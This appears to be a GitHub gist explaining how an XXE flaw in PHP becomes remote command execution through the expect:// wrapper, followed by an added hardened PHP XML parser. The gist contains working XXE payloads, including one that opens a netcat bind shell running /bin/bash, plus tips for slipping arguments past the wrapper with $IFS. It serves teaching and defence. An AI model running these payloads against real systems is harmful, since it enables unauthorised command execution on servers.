Last active: November 15, 2021 08:30
Gist: mosesrenegade/d81c5ca134e6b65f93422a8c09ba681b
What follows is how an XXE in PHP turns into RCE through the `expect://` stream wrapper. The catch is that spaces inside the `expect://` URL are not interpreted correctly, so the command's arguments get mangled. Tip: use `$IFS` (Bash's Internal Field Separator) in place of each space. Another tip, for the defending side: don't allow XXE in the first place.
https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://ls$IFS-lahrt">]>
<entry>
<subject>&xxe;</subject>
<category>Test</category>
<text>Test</text>
</entry>
```
You also need to wrap any arguments that are numbers, or that contain special characters, in single quotes:
```xml
<!ENTITY xxe SYSTEM "expect://nc$IFS-nvlp$IFS'3334'$IFS-e$IFS'/bin/bash'">]>
```
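For the "don't allow XXE" side of the note, here is an added example (not part of the gist, and not the Medium article's code) of what a PHP endpoint that accepts XML should do instead. It shows the vulnerable pattern (passing `LIBXML_NOENT`, which is what makes `&xxe;` resolve through whatever wrapper the `SYSTEM` identifier names) beside a hardened parse that rejects any DOCTYPE up front, never enables entity substitution, forbids network access, and installs an external entity loader that refuses every request. It also checks whether the `expect://` wrapper is registered at all, since it only exists when the PECL expect extension is loaded. The function names, the field names and the two sample documents are assumptions made for the example; the payload sample reuses the gist's structure with the `ls` command from above.

```php
<?php
// Added defensive example (not part of the gist). Function names, the
// <subject> field and both sample documents are assumptions for illustration.
declare(strict_types=1);

// Constructed sample: same shape as the gist's payload, with an external
// entity that would be resolved through the expect:// wrapper.
const SAMPLE_XXE = <<<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://ls">]>
<entry><subject>&xxe;</subject><category>Test</category><text>Test</text></entry>
XML;

// Constructed sample: a benign document with no DTD at all.
const SAMPLE_OK = <<<'XML'
<?xml version="1.0"?>
<entry><subject>hello</subject><category>Test</category><text>Test</text></entry>
XML;

/** Is the expect:// stream wrapper registered in this PHP build? It is only
 *  present when the PECL expect extension is loaded, so this is the first
 *  thing to verify on a host that parses untrusted XML. */
function expectWrapperEnabled(): bool
{
    return in_array('expect', stream_get_wrappers(), true);
}

/** Vulnerable pattern: LIBXML_NOENT makes libxml substitute entities,
 *  external ones included, so &xxe; is fetched through the wrapper named
 *  in the SYSTEM identifier. Kept only to contrast with the hardened
 *  version below; never call this on untrusted input. */
function parseUnsafe(string $xml): string
{
    $dom = new DOMDocument();
    $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
    return $dom->getElementsByTagName('subject')->item(0)?->textContent ?? '';
}

/** Hardened parse: refuse any document carrying a DOCTYPE before it reaches
 *  libxml, never pass LIBXML_NOENT, forbid network access, and install an
 *  external entity loader that denies every request as defence in depth.
 *  Returns null when the document is rejected. */
function parseHardened(string $xml): ?string
{
    // Cheap first gate: a DTD has no business in a data-only API payload.
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        return null;
    }

    // Defence in depth: even if a DTD slipped through, no external entity
    // (file://, http://, expect://, ...) will be resolved.
    libxml_set_external_entity_loader(static fn ($public, $system, $ctx) => null);

    $previous = libxml_use_internal_errors(true);
    try {
        $dom = new DOMDocument();
        // LIBXML_NONET: no network fetches; LIBXML_NOENT deliberately absent.
        $ok = $dom->loadXML($xml, LIBXML_NONET);
        if ($ok === false || libxml_get_errors() !== []) {
            return null;
        }
        $subject = $dom->getElementsByTagName('subject')->item(0);
        return $subject === null ? null : $subject->textContent;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($previous);
        libxml_set_external_entity_loader(null); // restore the default loader
    }
}

// Usage: only the hardened parser is exercised here.
printf("expect:// wrapper available: %s\n", expectWrapperEnabled() ? 'yes' : 'no');
var_dump(parseHardened(SAMPLE_XXE)); // NULL: DOCTYPE rejected before parsing
var_dump(parseHardened(SAMPLE_OK));  // string(5) "hello"
```

The DOCTYPE regex is deliberately blunt: for an API that only ever exchanges plain data documents, rejecting every DTD is simpler to reason about than trying to allow "safe" ones, and the entity loader callback catches anything the regex misses. On PHP 8 external entity loading is already off unless `LIBXML_NOENT` or `LIBXML_DTDLOAD` is passed, so the real review task is grepping the code base for those flags, for `libxml_disable_entity_loader(false)`, and for `simplexml_load_string()` calls that pass them.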